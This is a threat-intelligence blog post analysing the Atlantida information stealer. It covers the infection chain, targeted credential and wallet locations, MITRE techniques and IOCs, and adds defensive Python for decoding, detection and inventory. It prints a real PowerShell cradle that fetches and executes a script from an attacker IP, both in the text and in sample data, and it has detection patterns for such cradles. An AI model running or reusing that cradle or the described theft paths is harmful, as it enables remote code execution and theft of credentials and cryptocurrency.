Last updated at Tue, 27 Feb 2024 16:14:43 GMT
Recently, Rapid7 discovered a new stealer named Atlantida. The stealer lures users into downloading malicious files from compromised websites and uses several evasion techniques, such as reflective loading and injection, before the stealer itself is loaded.
Atlantida steals a large amount of login information from software such as Telegram and Steam, data from several offline cryptocurrency wallets, browser-stored data, and data from cryptocurrency-wallet browser extensions. It also captures the victim's screen and collects hardware data.
Technical Analysis
Stage 1 - Delivery
The attack starts with a user downloading a malicious .hta file from a compromised website. It is worth mentioning that the .hta file is manually executed by the victim. When investigating the file, we observed a Visual Basic script decrypting a hard-coded base64 string and executing the decrypted content:
The decrypted command: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm hxxp://166.1.160[.]10/loader.txt | iex`
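The .hta described above hides its command inside a base64 string that the VBScript decodes at runtime. As an added triage example (not Rapid7 tooling), the Python below pulls base64 runs out of a script, keeps the ones that decode to readable text, and tags PowerShell download-and-execute indicators in the result. The sample .hta is constructed for this example from the decrypted command quoted in the post; it is not the real ReadEra_v1.4.2.hta and contains no execution logic.

```python
"""Static triage of an .hta that stores its payload command as base64.

Added example, not Rapid7 code. The sample .hta is constructed here: it only
declares the encoded string, the way the post says the real dropper does.
"""
import base64
import re

# Decrypted command quoted in the post; used only to build the constructed sample
COMMAND = ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
           'irm hxxp://166.1.160[.]10/loader.txt | iex')

# Constructed .hta mimicking the described pattern (not the real dropper)
SAMPLE_HTA = f"""<html><head><script language="VBScript">
Dim enc: enc = "{base64.b64encode(COMMAND.encode()).decode()}"
' the real dropper decodes enc and runs the result; omitted here on purpose
</script></head><body></body></html>"""

# A run of 24+ base64 characters, optionally padded
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Indicators an analyst would want flagged in decoded output
INDICATORS = {
    "powershell": re.compile(r"powershell(\.exe)?", re.I),
    "download": re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|"
                           r"downloadstring|downloaddata)\b", re.I),
    "execute": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "url": re.compile(r"(https?|hxxps?)://", re.I),
}


def _as_text(raw: bytes):
    """Return the bytes as text if they are printable UTF-8 or UTF-16LE, else None."""
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text and all(c.isprintable() or c in "\r\n\t" for c in text):
            return text
    return None


def decode_embedded_base64(script: str):
    """Find base64 runs, decode those that yield readable text, tag indicators."""
    results = []
    for match in B64_RUN.finditer(script):
        blob = match.group(0)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        text = _as_text(raw)
        if text is None:
            continue
        tags = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
        results.append({"decoded": text, "indicators": tags})
    return results


if __name__ == "__main__":
    for hit in decode_embedded_base64(SAMPLE_HTA):
        print(hit["indicators"], "->", hit["decoded"])
```

Run it against a real .hta by reading the file as text and passing it to `decode_embedded_base64`; a decoded string that carries both a download and an execute indicator is the cradle this post describes.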
Stage 2 - Three levels of in-memory loading
The executed PowerShell command downloads and executes the next-stage PowerShell script in memory.
The PowerShell script downloads and reflectively loads a .NET downloader. The .NET downloader is a simple downloader that calls the DownloadData API function to get a Donut injector. Donut is position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and .NET assemblies. Next, the Donut is injected into a newly created "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" process using the Remote Thread Injection technique (aka CreateRemoteThread). This technique works by writing shellcode into the context of another eligible process and creating a thread in that process to run the payload.
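As an added detection example (not Rapid7's code and not its ABA rule), the Python below runs over a few constructed Sysmon-style events and flags the chain of Stages 1 and 2: mshta.exe spawning powershell.exe, a PowerShell download-and-execute cradle, powershell.exe starting RegAsm.exe, and a remote thread created in RegAsm.exe from another process. The key=value event layout and field names are assumptions for the example; map them to your own telemetry schema.

```python
"""Detection logic for the Atlantida delivery and loading chain.

Added example, not Rapid7 code. Events are constructed Sysmon-style lines:
EventID 1 = process creation, EventID 8 = CreateRemoteThread.
"""
import ntpath
import re
from dataclasses import dataclass

# Constructed sample telemetry (not real logs); paths and PIDs are invented
SAMPLE_EVENTS = r"""
EventID=1 ProcessId=4120 Image=C:\Windows\System32\mshta.exe ParentImage=C:\Windows\explorer.exe CommandLine="mshta.exe C:\Users\victim\Downloads\ReadEra_v1.4.2.hta"
EventID=1 ProcessId=4188 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\System32\mshta.exe CommandLine="powershell.exe irm hxxp://166.1.160[.]10/loader.txt | iex"
EventID=1 ProcessId=4220 Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="RegAsm.exe"
EventID=8 SourceProcessId=4188 SourceImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TargetProcessId=4220 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
EventID=1 ProcessId=5000 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe CommandLine="powershell.exe Get-Process"
"""

KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')  # key=value, quoted values may hold spaces
# Download-then-execute cradle, as in the decrypted .hta command (irm ... | iex)
DOWNLOAD = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|"
                      r"downloadstring|downloaddata)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    process_id: int
    detail: str


def parse_event(line: str) -> dict:
    """Parse one key=value event line into a dict."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in KV.finditer(line)}


def exe(path) -> str:
    """Lower-cased file name of a Windows path (ntpath works on any host OS)."""
    return ntpath.basename(path or "").lower()


def detect(lines):
    """Return a Finding for every event matching one of the four rules."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") == "1":  # process creation
            pid = int(ev["ProcessId"])
            image, parent = exe(ev.get("Image")), exe(ev.get("ParentImage"))
            cmd = ev.get("CommandLine", "")
            if parent == "mshta.exe" and image == "powershell.exe":
                findings.append(Finding("mshta_spawns_powershell", pid, cmd))
            if image == "powershell.exe" and DOWNLOAD.search(cmd) and EXECUTE.search(cmd):
                findings.append(Finding("powershell_download_cradle", pid, cmd))
            if image == "regasm.exe" and parent == "powershell.exe":
                findings.append(Finding("powershell_spawns_regasm", pid, cmd))
        elif ev.get("EventID") == "8":  # CreateRemoteThread
            target, source = exe(ev.get("TargetImage")), exe(ev.get("SourceImage"))
            if target == "regasm.exe" and source != "regasm.exe":
                findings.append(Finding("remote_thread_into_regasm",
                                        int(ev["TargetProcessId"]), ev.get("SourceImage", "")))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS.strip().splitlines()):
        print(f"[{f.rule}] pid={f.process_id} {f.detail}")
```

The benign PowerShell process in the sample (PID 5000) produces no finding, which is the point of requiring both a download and an execute verb before calling a command line a cradle; RegAsm.exe launched by PowerShell, and a remote thread placed into it by another process, are each rare enough on a workstation to warrant their own alert.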
Stage 3 - Atlantida Stealer
The Donut injector is used to load the final payload, which in our case is a new Atlantida stealer. It is named after a string in the executable.
First, the Atlantida stealer captures the entire screen using a combination of the GetDC, CreateCompatibleDC, CreateDIBSection, SelectObject and BitBlt API functions. Next, it checks whether a FileZilla (open source FTP software that allows users to transfer files from a local computer to a remote computer) recent-servers file exists. It does that by attempting to open "C:\Users\username\AppData\Roaming\FileZilla\recentservers.xml"; if it exists, it reads the file. Next, it looks for the following offline cryptocurrency wallets by enumerating files under the wallet paths:
The stealer reads all files found under the enumerated paths.
Next, it collects the victim's hardware data, such as RAM, GPU, CPU and screen resolution. The stealer enumerates the user's Desktop folder and reads all text files (.txt). It also looks for Binance wallet credentials by enumerating the "C:\Users\Username\AppData\Roaming\Binance" directory and reading all JSON files under it.
The configuration and credentials of Steam (a digital distribution service for video games) are also of interest to the Atlantida stealer, as we observed it enumerating the Steam configuration directory and searching for the following files:
- Ssfn - Steam Sentry File.
- Config.vdf - Steam configuration file.
- Loginusers.vdf - Stores records of previously logged-in Steam accounts.
The last thing Atlantida collects is Telegram data. It collects all data located in "C:\Users\Username\AppData\Roaming\Telegram Desktop\tdata".
The stealer now connects to the hard-coded C&C server (45.144.232.99). We visited the hard-coded IP and landed on a login page that we believe is a stealer control panel, which also had an `Atlantida` title.
No data is passed to the C&C server at this point, and the stealer continues its collection. Differently from other stealers, Atlantida focuses on only three browsers: Google Chrome, Mozilla Firefox and Microsoft Edge. It steals all stored passwords, cookies, tokens, credit cards and autofill data.
One of its notable features is its ability to steal data from Chromium-based browser extensions. Every Chromium-based extension is assigned an "extension ID", and the malware uses these IDs to locate the data stored by each extension. Atlantida collects data from the following cryptocurrency wallet extensions:
Extension Name | Extension ID |
---|---|
Metamask | nkbihfbeogaeaoehlefnkodbefgpgknn |
Sollet | fhmfendgdocmcbmfikdcogofphimnkno |
BNB chain wallet | fhbohimaelbohpjbbldcngcnapndodjp |
Phantom | bfnaelmomeimhlpmgjnjophhpkkoljpa |
Metawallet | bkklifkecemccedpkhcebagjpehhabfb |
Yoroi | ffnbelfdoeiohenkjibnmadjiehjhajb |
Nami | lpfcbjknijpeeillifnkikgncikgfhdo |
Flint | hnhobjmcibchnmglfbldbfabcgaknlkj |
CardWallet | apnehcjmnengpnmccpaibjmhhoadaico |
Guildwallet | nanjmdknhkinifnkgdcggcfnhdaammmj |
TronWallet | pnndplcbkakcplkjnolgbkdgjikjednm |
CryptoAirdrops | dhgnlgphgchebgoemcjekedjjbifijid |
Bitoke | oijajbhmelbcoclnkdmembiacmeghbae |
Coin89 | aeachknmefphepccionboohckonoeemg |
XDefiWallet | hmeobnfnfcmdkdcmlblgagmfpfboieaf |
Keplr | dmkamcknogkgcdfhhbddcghachkejeap |
FreaksAxie | copjnifcecdedocejpaapepagaodgpbh |
Oasis | ppdadbejkmjnefldpcdjhnkpbjkikoip |
Rabby | acmacodkjbdgmoleebolmdjonilkdbch |
MathWallet | afbcbjpbpfadlkmhmclhkeeodmamcflc |
NiftyWallet | jbdaocneiiinmjbjlgalhcelgbejmnid |
Guarda | hpglfhgfnhbgpjdenjgmdgoeiappafln |
EQUALWallet | blnieiiffboillknjnepogjhkgnoapac |
BitAppWallet | fihkakfobkmkjojpchpfgcmhfjnmnfpi |
iWallet | kncchdigobghenbbaddojjnnaogfppfj |
Wombat | amkmjjmmflddogmhpjloimipbofnfjih |
MEW CX | nlbmnnijcnlegkjjpcfjclmcfggfefdm |
GuildWallet | nkddgncdjgjfcddamfgcmfnlhccnimig |
Saturn Wallet | cphhlgmgameodnhkjdmkpanlelnlohao |
CloverWallet | nhnkbkgjikgcigadomkphalanndcapjk |
LiqualityWallet | kpfopkelmapcoipemfendmdcghnegimn |
TerraStation | aiifbnbfobpmeekipheeijimdpnlpgpp |
AuroWallet | cnmamaachppnkjgnildpdmkaakejnhae |
Polymesh Wallet | jojhfeoedkpkglbfimdfabpdfjaoolaf |
ICONex | flpiciilemghbmfalicajoolhkkenfel |
NaboxWallet | nknhiehlklippafakaeklbeglecifhad |
KHC | hcflpincpppdclinealmandijcmnkbgn |
Temple | ookjlbkiijinhpmnjffcofjonbfbgaoc |
TezBox | mnfifefkajgofkcjkemidiaecocnkjeh |
CyanoWallet | dkdedlpgdmmkkfjabffeganieamfklkm |
Byone | nlgbhdfgdhgbiamfdfmbikcdghidoadd |
OneKey | infeboajgfhgbjpjbeppbkgnabfdkdaf |
Leaf Wallet | cihmoadaighcejopammfbmddcmdekcje |
BitClip | ijmpgkjfkbfhoebgogflfebnmejmfbml |
NashExtension | onofpnbbkehpmmoabgpcpmigafmmnjhl |
HyconLiteClient | bcopgchhojmggmffilplmbdicgaihlkp |
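Because Atlantida keys on the extension IDs in the table above, a defender can use the same list to find out which hosts hold wallet-extension data the stealer would collect. As an added example (not Rapid7 code), the Python below lists the extension IDs installed in a Chromium profile, which Chrome and Edge store as directory names under the profile's `Extensions` folder, and reports any that appear in the table. The default profile paths are the standard Windows locations for Chrome and Edge; the `demo()` function builds a constructed profile layout in a temporary directory so the check can be exercised anywhere.

```python
"""Inventory of targeted cryptocurrency-wallet extensions in Chromium profiles.

Added example, not Rapid7 code. Chromium-based browsers install each extension
under <profile>/Extensions/<extension id>/<version>/, so the directory names
are the IDs Atlantida looks for.
"""
import re
import tempfile
from pathlib import Path

# Extension IDs exactly as listed in the post's table (ID -> wallet name)
WALLET_EXTENSIONS = {
    "nkbihfbeogaeaoehlefnkodbefgpgknn": "Metamask", "fhmfendgdocmcbmfikdcogofphimnkno": "Sollet",
    "fhbohimaelbohpjbbldcngcnapndodjp": "BNB chain wallet", "bfnaelmomeimhlpmgjnjophhpkkoljpa": "Phantom",
    "bkklifkecemccedpkhcebagjpehhabfb": "Metawallet", "ffnbelfdoeiohenkjibnmadjiehjhajb": "Yoroi",
    "lpfcbjknijpeeillifnkikgncikgfhdo": "Nami", "hnhobjmcibchnmglfbldbfabcgaknlkj": "Flint",
    "apnehcjmnengpnmccpaibjmhhoadaico": "CardWallet", "nanjmdknhkinifnkgdcggcfnhdaammmj": "Guildwallet",
    "pnndplcbkakcplkjnolgbkdgjikjednm": "TronWallet", "dhgnlgphgchebgoemcjekedjjbifijid": "CryptoAirdrops",
    "oijajbhmelbcoclnkdmembiacmeghbae": "Bitoke", "aeachknmefphepccionboohckonoeemg": "Coin89",
    "hmeobnfnfcmdkdcmlblgagmfpfboieaf": "XDefiWallet", "dmkamcknogkgcdfhhbddcghachkejeap": "Keplr",
    "copjnifcecdedocejpaapepagaodgpbh": "FreaksAxie", "ppdadbejkmjnefldpcdjhnkpbjkikoip": "Oasis",
    "acmacodkjbdgmoleebolmdjonilkdbch": "Rabby", "afbcbjpbpfadlkmhmclhkeeodmamcflc": "MathWallet",
    "jbdaocneiiinmjbjlgalhcelgbejmnid": "NiftyWallet", "hpglfhgfnhbgpjdenjgmdgoeiappafln": "Guarda",
    "blnieiiffboillknjnepogjhkgnoapac": "EQUALWallet", "fihkakfobkmkjojpchpfgcmhfjnmnfpi": "BitAppWallet",
    "kncchdigobghenbbaddojjnnaogfppfj": "iWallet", "amkmjjmmflddogmhpjloimipbofnfjih": "Wombat",
    "nlbmnnijcnlegkjjpcfjclmcfggfefdm": "MEW CX", "nkddgncdjgjfcddamfgcmfnlhccnimig": "GuildWallet",
    "cphhlgmgameodnhkjdmkpanlelnlohao": "Saturn Wallet", "nhnkbkgjikgcigadomkphalanndcapjk": "CloverWallet",
    "kpfopkelmapcoipemfendmdcghnegimn": "LiqualityWallet", "aiifbnbfobpmeekipheeijimdpnlpgpp": "TerraStation",
    "cnmamaachppnkjgnildpdmkaakejnhae": "AuroWallet", "jojhfeoedkpkglbfimdfabpdfjaoolaf": "Polymesh Wallet",
    "flpiciilemghbmfalicajoolhkkenfel": "ICONex", "nknhiehlklippafakaeklbeglecifhad": "NaboxWallet",
    "hcflpincpppdclinealmandijcmnkbgn": "KHC", "ookjlbkiijinhpmnjffcofjonbfbgaoc": "Temple",
    "mnfifefkajgofkcjkemidiaecocnkjeh": "TezBox", "dkdedlpgdmmkkfjabffeganieamfklkm": "CyanoWallet",
    "nlgbhdfgdhgbiamfdfmbikcdghidoadd": "Byone", "infeboajgfhgbjpjbeppbkgnabfdkdaf": "OneKey",
    "cihmoadaighcejopammfbmddcmdekcje": "Leaf Wallet", "ijmpgkjfkbfhoebgogflfebnmejmfbml": "BitClip",
    "onofpnbbkehpmmoabgpcpmigafmmnjhl": "NashExtension", "bcopgchhojmggmffilplmbdicgaihlkp": "HyconLiteClient",
}

VALID_ID = re.compile(r"[a-p]{32}")  # Chromium extension IDs: 32 characters from a-p


def default_profile_dirs():
    """Standard default-profile locations of the two Chromium browsers the post names."""
    home = Path.home()
    return [home / "AppData/Local/Google/Chrome/User Data/Default",
            home / "AppData/Local/Microsoft/Edge/User Data/Default"]


def installed_extension_ids(profile_dir) -> set:
    """IDs of extensions installed in a profile (well-formed directory names under Extensions/)."""
    ext_dir = Path(profile_dir) / "Extensions"
    if not ext_dir.is_dir():
        return set()
    return {p.name for p in ext_dir.iterdir() if p.is_dir() and VALID_ID.fullmatch(p.name)}


def wallet_extensions_present(profile_dir) -> dict:
    """Installed extension IDs that Atlantida targets, mapped to their wallet names."""
    return {eid: WALLET_EXTENSIONS[eid]
            for eid in sorted(installed_extension_ids(profile_dir)) if eid in WALLET_EXTENSIONS}


def demo() -> dict:
    """Constructed profile layout: two targeted wallets, one unrelated ID, one junk folder."""
    with tempfile.TemporaryDirectory() as tmp:
        ext = Path(tmp) / "Extensions"
        for name in ("nkbihfbeogaeaoehlefnkodbefgpgknn", "bfnaelmomeimhlpmgjnjophhpkkoljpa",
                     "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", "Temp"):
            (ext / name / "1.0.0").mkdir(parents=True)
        return wallet_extensions_present(tmp)


if __name__ == "__main__":
    for profile in default_profile_dirs():
        print(profile, "->", wallet_extensions_present(profile) or "no targeted wallet extensions")
```

Run across a fleet, the output tells you which users would lose wallet-extension data if this stealer ran on their host, which is the population to prioritise for password and seed-phrase rotation after an incident; Firefox is omitted because it does not use Chromium extension IDs.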
When the stealer finishes collecting, all data is compressed and sent to the C&C server. Then the malware exits.
Rapid7 Customers
For Rapid7 MDR and InsightIDR customers, the following Attacker Behavior Analytics (ABA) rule is currently deployed and alerts on the activity described in this blog:
- Suspicious Process - MSHTA Spawns PowerShell
MITRE ATT&CK Techniques:
Tactic | Technique | Details |
---|---|---|
Execution | User Execution: Malicious File (T1204.002) | A user downloads and executes a malicious .hta file |
Execution | Command and Scripting Interpreter: Visual Basic (T1059.005) | The .hta contains a malicious VBScript function |
Execution | Command and Scripting Interpreter: PowerShell (T1059.001) | The VBScript executes PowerShell to download a PowerShell script |
Command and Control | Ingress Tool Transfer (T1105) | A PowerShell script downloads an additional .NET loader |
Defense Evasion | Reflective Code Loading (T1620) | The PowerShell script executes the loader reflectively |
Defense Evasion | Process Injection (T1055) | The .NET loader injects into the RegAsm.exe process |
Credential Access | Credentials from Password Stores: Credentials from Web Browsers (T1555.003) | Atlantida steals stored browser data such as passwords, cookies, tokens, credit cards and autofill data |
Credential Access | Credentials from Password Stores (T1555) | Atlantida steals offline cryptocurrency wallet data and other software data |
Discovery | System Information Discovery (T1082) | Atlantida collects the victim's hardware information |
Collection | Screen Capture (T1113) | Atlantida captures the victim's screen |
Exfiltration | Exfiltration Over C2 Channel (T1041) | Atlantida exfiltrates all collected data |
IOCs
IOC | SHA-256 | Notes |
---|---|---|
ReadEra_v1.4.2.hta | 67b8776b9d8f581173bcb471e91ff1701cafbc92aaed858fe3cb26a31dd6a6d8 | Malicious .hta file |
http://166.1.160[.]10/loader.txt | | Malicious PowerShell script |
http://166.1.160[.]10/www_c.bin | f935143dba2fb65eef931c1dac74a740e58e9e911a13457f4cfa4c73a0c673b3 | Stores .NET loader |
http://166.1.160[.]10/www.bin | 350216884486d1fafbd60e1d9c87c48149b058e4fab6b9a2a5cd7ea67ab250a0 | Stores Donut shellcode |
AtlantidaStealer.exe | b4f4d51431c4e3f7aeb01057dc851454cff4e64d16c05d9da12dfb428715d130 | Atlantida stealer |
45.144.232[.]99 | | C&C server |